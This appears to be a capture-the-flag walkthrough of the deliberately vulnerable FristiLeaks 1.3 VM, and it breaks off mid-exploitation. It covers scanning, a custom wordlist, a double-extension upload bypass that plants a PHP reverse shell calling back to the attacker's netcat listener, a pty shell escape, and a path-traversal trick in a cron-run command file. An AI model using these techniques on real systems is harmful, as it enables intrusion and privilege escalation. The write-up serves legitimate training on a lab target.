“A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..” – Ar0xA
[note!!] VMware users will need to manually edit the VM’s MAC address to: 08:00:27:A5:A6:76
More information and OVA file download please check here.
Attacker & Target
Attacker: Kali2 Linux (10.1.1.130/24)
Target: FristiLeaks: 1.3 (10.1.1.150/24)
Vulnerability & Exploit
There is no acutal Vulnerabilities, all you need to do to take down this VM is Enumeration and more enumberation.
Create customized dictionary list and brute force to find hidden folders
Using arp-scan as routine to detect the target’s IP address.
1234567891011
root@kali:~/fristileaks# arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)10.1.1.1 00:50:56:c0:00:08 VMware, Inc.
10.1.1.2 00:50:56:fd:d1:6b VMware, Inc.
10.1.1.150 08:00:27:a5:a6:76 CADMUS COMPUTER SYSTEMS
10.1.1.254 00:50:56:e5:d1:58 VMware, Inc.
4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.661 seconds (96.20 hosts/sec). 4 responded
root@kali:~/fristileaks#
10.1.1.150 is our Target!
Then run masscan to detect opening ports on the target (masscan is much faster than nmap when doing a full ports scan, so here I use it to make a full scan and then use nmap to do a deep scan on target ports).
# Nmap 6.49BETA5 scan initiated Sun Dec 27 06:52:12 2015 as: nmap -sV -v -A -O -p 80 -oN 10.1.1.150_nmap.txt 10.1.1.150Nmap scan report for 10.1.1.150
Host is up (0.00041s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)| http-methods: GET HEAD POST OPTIONS TRACE
| Potentially risky methods: TRACE
|_See http://nmap.org/nsedoc/scripts/http-methods.html
| http-robots.txt: 3 disallowed entries
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html;charset=UTF-8).
MAC Address: 08:00:27:A5:A6:76 (Cadmus Computer Systems)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 2.6.32 - 3.13
Uptime guess: 49.708 days (since Sat Nov 7 13:52:17 2015)Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258(Good luck!)IP ID Sequence Generation: All zeros
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 10.1.1.150
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 27 06:52:21 2015 -- 1 IP address (1 host up) scanned in 10.27 seconds
based on the result, I noticed that there are three folders:
/cola
/sisi
/beer
Also, from the response header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3, I know the target is running Apache version 2.2.15 which is outdated, and the keyword DAV/2 shows that WebDAV should be enabled.
In the meanwhile, I run nikto to scan web vulnerabilities.
1234567891011121314151617181920212223242526272829
root@kali:~# nikto -host http://10.1.1.150
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.1.1.150
+ Target Hostname: 10.1.1.150
+ Target Port: 80
+ Start Time: 2015-12-27 06:53:18 (GMT-5)---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
+ Server leaks inodes via ETags, header found with file /, inode: 12722, size: 703, mtime: Tue Nov 17 13:45:47 2015
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ Entry '/cola/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/sisi/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ Entry '/beer/' in robots.txt returned a non-forbidden or redirect HTTP code (200)+ "robots.txt" contains 3 entries which should be manually viewed.
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ PHP/5.3.3 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8330 requests: 0 error(s) and 16 item(s) reported on remote host
+ End Time: 2015-12-27 06:53:38 (GMT-5)(20 seconds)---------------------------------------------------------------------------
+ 1 host(s) tested
The result just proved what we have found previously but nothing new.
Then I visit the three folders one by one, but keep getting the same responded picture:
After tried dirbuster with several default dictionary files but nothing found, I decided to make a customized dict list which including all the words displayed in the web pages and images with tool cewl.
root@kali:~/fristileaks# cewl -v -d 2 -w cewl_dict_list.txt http://10.1.1.150/
root@kali:~/fristileaks# cat cewl_dict_list.txt
Ar0xA
meneer
quick
hackme
Welcome
Goal
get
UID
root
and
readthe
special
flag
file
Timeframe
should
doable
hours
The
fristileaks
motto
Fristileaks
2015
are
Fristleaks
barrebas
rikvduijn
wez3forsec
PyroBatNL
0xDUDE
annejanbrouwer
Sander2121
Reinierk
DearCharles
miamat
MisterXE
BasB
Dwight
Egeltje
pdersjant
tcp130x10
spierenburg
ielmatani
renepieters
Mystery
guest
uinix
WhatSecurity
mramsmeets
fristi
drink
keep
calm
Then I use wfuzz to discover any possible hidden path.
123456789101112131415161718
root@kali:~/fristileaks# wfuzz -c -z file,cewl_dict_list.txt --hc 404 http://10.1.1.150/FUZZ
********************************************************
* Wfuzz 2.0 - The Web Bruteforcer *
********************************************************
Target: http://10.1.1.150/FUZZ
Payload type: file,cewl.txt
Total requests: 54==================================================================ID Response Lines Word Chars Request==================================================================00051: C=3017 L 20 W 233 Ch " - fristi"root@kali:~/fristileaks#
From the result, there is one folder found fristi.
By visiting the new found path http://10.1.1.150/fristi/, a login page appeared in my firefox.
After tried some weak passwords but all failed, I found some clues in the source code.
First thing is that there is a comment written by eezeepz, in the top of the code:
1234567891011121314
<html><head><metaname="description"content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it."><!--TODO:We need to clean this up for production. I left some junk in here to make testing easier. - by eezeepz--></head><body><center><h1> Welcome to #fristileaks admin portal</h1></center>
and another comment, which is a base64 encoded string, has been inserted at the very bottom of the source code:
In terms of all the information we collected from this page/source code, I can guess the username is eezeepz and the password is keKkeKKeKKeKkEkkEk.
After login, I got a link to allow us upload file!
But when I trying to upload .php webshell, I got the following error, only png, jpg and gif are allowed.
In order to bypass the whitelist verification, I added .jpg at the end of the web shell’s file name to make it looks like rsh.php.jpg.
rsh.php is a reverse PHP shell which will connect back to my Kali’s tcp port 5555, so before I upload and trigger the shell, I setup nc to listen on port 5555.
Ok, after uploaded the reverse PHP shell, I can now visit it from uploads folder, the url is http://10.1.1.150/fristi/uploads/rsh.php.jpg.
Bingo! I got a shell now.
After enumeration I found Database sensitive information stored in the file /var/www/html/fristi/checklogin.php, user name eezeepz and the password is 4ll3maal12#
123456789101112131415161718
<\?phpob_start();$host="localhost";// Host name$username="eezeepz";// Mysql username$password="4ll3maal12#";// Mysql password$db_name="hackmenow";// Database name$tbl_name="members";// Table name// Connect to server and select databse.mysql_connect("$host","$username","$password")ordie("cannot connect");mysql_select_db("$db_name")ordie("cannot select DB");// Define $myusername and $mypassword$myusername=$_POST['myusername'];$mypassword=$_POST['mypassword'];...turncate...
The first thing I thought was to login via SSH with the found username and password, but SSH is not running on the target server.
Then, I tried su command but it has too be called from a TTY session. by using the trick python -c "import pty; pty.spawn('/bin/bash');" to jail break, I can try su again with the login credential. But still failed, Damn, the password is wrong.
1234567
sh-4.1$ python -c "import pty; pty.spawn('/bin/bash');"python -c "import pty; pty.spawn('/bin/bash');"bash-4.1$ su eezeepz
su eezeepz
Password: 4ll3maal12#
idsu: incorrect password
So I have to keep digging further, then I found a clue file notes.txt under the path /var/www/.
1234567891011121314151617181920
sh-4.1$ pwd/var/www
pwdsh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x. 6 root root 4096 Nov 17 13:50 .
drwxr-xr-x. 19 root root 4096 Nov 19 01:41 ..
drwxr-xr-x. 2 root root 4096 Aug 24 13:53 cgi-bin
drwxr-xr-x. 3 root root 4096 Nov 17 03:29 error
drwxr-xr-x. 7 root root 4096 Nov 25 04:10 html
drwxr-xr-x. 3 root root 4096 Nov 17 03:37 icons
-rw-r--r-- 1 root root 98 Nov 17 13:50 notes.txt
sh-4.1$ cat notes.txt
cat notes.txt
hey eezeepz your homedir is a mess, go clean it up, just dont delete
the important stuff.
-jerry
sh-4.1$
In that file, jerry mentioned home directory about user eezeepz. by following this clue, I checked /home directory:
1234567891011
sh-4.1$ cd /home
cd /home
sh-4.1$ ls -al
ls -al
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
drwx------. 2 admin admin 4096 Nov 19 02:03 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 fristigod
sh-4.1$
As we can see from above, home folder eezeepz has global read and execute permission for anyone.
sh-4.1$ ls -al
ls -al
total 2608
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .Old
-rw-r--r--. 1 eezeepz eezeepz 18 Sep 22 12:40 .bash_logout
-rw-r--r--. 1 eezeepz eezeepz 176 Sep 22 12:40 .bash_profile
-rw-r--r--. 1 eezeepz eezeepz 124 Sep 22 12:40 .bashrc
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .gnome
drwxrwxr-x. 2 eezeepz eezeepz 4096 Nov 17 09:40 .settings
-rwxr-xr-x. 1 eezeepz eezeepz 24376 Nov 17 09:49 MAKEDEV
-rwxr-xr-x. 1 eezeepz eezeepz 33559 Nov 17 09:49 cbq
-rwxr-xr-x. 1 eezeepz eezeepz 6976 Nov 17 09:49 cciss_id
-rwxr-xr-x. 1 eezeepz eezeepz 56720 Nov 17 09:49 cfdisk
-rwxr-xr-x. 1 eezeepz eezeepz 25072 Nov 17 09:49 chcpu
-rwxr-xr-x. 1 eezeepz eezeepz 52936 Nov 17 09:48 chgrp
-rwxr-xr-x. 1 eezeepz eezeepz 31800 Nov 17 09:49 chkconfig
-rwxr-xr-x. 1 eezeepz eezeepz 48712 Nov 17 09:48 chmod
-rwxr-xr-x. 1 eezeepz eezeepz 53640 Nov 17 09:48 chown
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 09:49 clock
-rwxr-xr-x. 1 eezeepz eezeepz 4808 Nov 17 09:49 consoletype
-rwxr-xr-x. 1 eezeepz eezeepz 129992 Nov 17 09:48 cpio
-rwxr-xr-x. 1 eezeepz eezeepz 38608 Nov 17 09:49 cryptsetup
-rwxr-xr-x. 1 eezeepz eezeepz 5344 Nov 17 09:49 ctrlaltdel
-rwxr-xr-x. 1 eezeepz eezeepz 41704 Nov 17 09:48 cut
-rwxr-xr-x. 1 eezeepz eezeepz 14832 Nov 17 09:49 halt
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 hostname
-rwxr-xr-x. 1 eezeepz eezeepz 44528 Nov 17 09:49 hwclock
-rwxr-xr-x. 1 eezeepz eezeepz 7920 Nov 17 09:49 kbd_mode
-rwxr-xr-x. 1 eezeepz eezeepz 11576 Nov 17 09:49 kill-rwxr-xr-x. 1 eezeepz eezeepz 16472 Nov 17 09:49 killall5
-rwxr-xr-x. 1 eezeepz eezeepz 32928 Nov 17 09:49 kpartx
-rwxr-xr-x. 1 eezeepz eezeepz 11464 Nov 17 09:49 nameif
-rwxr-xr-x. 1 eezeepz eezeepz 171784 Nov 17 09:49 nano
-rwxr-xr-x. 1 eezeepz eezeepz 5512 Nov 17 09:49 netreport
-rwxr-xr-x. 1 eezeepz eezeepz 123360 Nov 17 09:49 netstat
-rwxr-xr-x. 1 eezeepz eezeepz 13892 Nov 17 09:49 new-kernel-pkg
-rwxr-xr-x. 1 eezeepz eezeepz 25208 Nov 17 09:49 nice
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 nisdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 4736 Nov 17 09:49 nologin
-r--r--r--. 1 eezeepz eezeepz 514 Nov 18 14:53 notes.txt
-rwxr-xr-x. 1 eezeepz eezeepz 390616 Nov 17 09:49 tar
-rwxr-xr-x. 1 eezeepz eezeepz 11352 Nov 17 09:49 taskset
-rwxr-xr-x. 1 eezeepz eezeepz 249000 Nov 17 09:49 tc
-rwxr-xr-x. 1 eezeepz eezeepz 51536 Nov 17 09:49 telinit
-rwxr-xr-x. 1 eezeepz eezeepz 47928 Nov 17 09:49 touch
-rwxr-xr-x. 1 eezeepz eezeepz 11440 Nov 17 09:49 tracepath
-rwxr-xr-x. 1 eezeepz eezeepz 12304 Nov 17 09:49 tracepath6
-rwxr-xr-x. 1 eezeepz eezeepz 21112 Nov 17 09:49 true-rwxr-xr-x. 1 eezeepz eezeepz 35608 Nov 17 09:49 tune2fs
-rwxr-xr-x. 1 eezeepz eezeepz 15410 Nov 17 09:49 weak-modules
-rwxr-xr-x. 1 eezeepz eezeepz 12216 Nov 17 09:49 wipefs
-rwxr-xr-x. 1 eezeepz eezeepz 504400 Nov 17 09:49 xfs_repair
-rwxr-xr-x. 1 eezeepz eezeepz 13712 Nov 17 09:49 ypdomainname
-rwxr-xr-x. 1 eezeepz eezeepz 62 Nov 17 09:49 zcat
-rwxr-xr-x. 1 eezeepz eezeepz 47520 Nov 17 09:47 zic
sh-4.1$
Well, it is really mess. but we can notice that there is another notes.txt which should be more clues in it.
123456789101112131415161718
sh-4.1$ cat notes.txt
cat notes.txt
Yo EZ,
I made it possible for you to do some automated checks,
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/
Don't forget to specify the full path for each binary!
Just put a file called "runthis" in /tmp/, each line one command. The
output goes to the file "cronresult" in /tmp/. It should
run every minute with my account privileges.
- Jerry
sh-4.1$
Looks like I have to break out of jail from runthis. So I create the file runthis under /tmp, which only including one command chmod 777 /home/admin to change folder permission of /home/admin. However, after couple of seconds waiting, I got the error information: command did not start with /home/admin or /usr/bin.
123456
bash-4.1$ cat /tmp/run
cat /tmp/runthis
chmod 777 /home/admin
bash-4.1$ cat /tmp/cron
cat /tmp/cronresult
command did not start with /home/admin or /usr/bin
Ok ok… so the command have to start with /home/admin or /usr/bin, so I modified the runthis file to /home/admin/../../bin/chmod -R 777 /home/admin, and waiting seconds, the /home/admin has been set to full permission now!
12345678
bash-4.1$ ls -al /home
ls -al /home
total 28
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 .
dr-xr-xr-x. 22 root root 4096 Dec 27 17:50 ..
drwxrwxrwx. 2 admin admin 4096 Nov 19 02:03 admin
drwx---r-x. 5 eezeepz eezeepz 12288 Nov 18 15:35 eezeepz
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 fristigod
Get into /home/admin and enumeration, found three suspect files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt.
12345678910111213141516171819202122
bash-4.1$ pwdpwd/home/admin
bash-4.1$ ls -al
ls -al
total 652
drwxrwxrwx. 2 admin admin 4096 Nov 19 02:03 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
-rwxrwxrwx. 1 admin admin 18 Sep 22 12:40 .bash_logout
-rwxrwxrwx. 1 admin admin 176 Sep 22 12:40 .bash_profile
-rwxrwxrwx. 1 admin admin 124 Sep 22 12:40 .bashrc
-rwxrwxrwx 1 admin admin 45224 Nov 18 13:42 cat
-rwxrwxrwx 1 admin admin 48712 Nov 18 14:14 chmod
-rwxrwxrwx 1 admin admin 737 Nov 18 14:48 cronjob.py
-rwxrwxrwx 1 admin admin 21 Nov 18 15:21 cryptedpass.txt
-rwxrwxrwx 1 admin admin 258 Nov 18 15:20 cryptpass.py
-rwxrwxrwx 1 admin admin 90544 Nov 18 13:49 df
-rwxrwxrwx 1 admin admin 24136 Nov 18 13:40 echo-rwxrwxrwx 1 admin admin 163600 Nov 18 13:42 egrep
-rwxrwxrwx 1 admin admin 163600 Nov 18 13:42 grep
-rwxrwxrwx 1 admin admin 85304 Nov 18 13:41 ps
-rw-r--r-- 1 fristigod fristigod 25 Nov 19 01:47 whoisyourgodnow.txt
The file cryptedpass.txt contain crypted string mVGZ3O3omkJLmy2pcuTq and the file cryptpass.py seems a crypto program which the process is
My best guess is that LetThereBeFristi! is the password of the user fristigod … and … Yes! I am fristigod now!
1234567891011121314151617181920212223
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!
bash-4.1$ id
id
uid=502(fristigod)gid=502(fristigod)groups=502(fristigod)bash-4.1$ cd /home
cd /home
bash-4.1$ ls
ls
admin eezeepz fristigod
bash-4.1$ cd fristigod
cd fristigod
bash-4.1$ ls -al
ls -al
total 20
drwx------ 2 fristigod fristigod 4096 Nov 19 01:40 .
drwxr-xr-x. 5 root root 4096 Nov 19 01:40 ..
-rw-r--r-- 1 fristigod fristigod 18 Sep 22 12:40 .bash_logout
-rw-r--r-- 1 fristigod fristigod 176 Sep 22 12:40 .bash_profile
-rw-r--r-- 1 fristigod fristigod 124 Sep 22 12:40 .bashrc
bash-4.1$
After enumeration, I found something interesting:
123456789101112131415
bash-4.1$ sudo -l
sudo -l
[sudo] password for fristigod: LetThereBeFristi!
Matching Defaults entries for fristigod on this host:
requiretty, !visiblepw, always_set_home, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User fristigod may run the following commands on this host:
(fristi : ALL) /var/fristigod/.secret_admin_stuff/doCom
After checking the file /var/fristigod/.secret_admin_stuff/doCom, I know this binary is owned by root and the sticky bit has been set. It will allow people to run command as ROOT.
12345678910111213141516171819202122232425
bash-4.1$ ls -al /var/fristigod/.secret_admin_stuff/doCom
ls -al /var/fristigod/.secret_admin_stuff/doCom
-rwsr-sr-x 1 root root 7529 Nov 25 05:53 /var/fristigod/.secret_admin_stuff/doCom
bash-4.1$ strings /var/fristigod/.secret_admin_stuff/doCom
strings /var/fristigod/.secret_admin_stuff/doCom
/lib64/ld-linux-x86-64.so.2
__gmon_start__
libc.so.6
setuid
exitstrcat
stderr
system
getuid
fwrite
__libc_start_main
GLIBC_2.2.5
fff.
fffff.
l$ L
t$(L
|$0HNice try, but wrong user ;)Usage: ./program_name terminal_command ...
bash-4.1$
But when I run the binary file /var/fristigod/.secret_admin_stuff/doCom, I got wrong user error message :(`
1234567
bash-4.1$ id
id
uid=502(fristigod)gid=502(fristigod)groups=502(fristigod)bash-4.1$ /var/fristigod/.secret_admin_stuff/doCom
/var/fristigod/.secret_admin_stuff/doCom
Nice try, but wrong user ;)bash-4.1$
After further enumeration… I finally got clues in /var/fristigod/.bash_history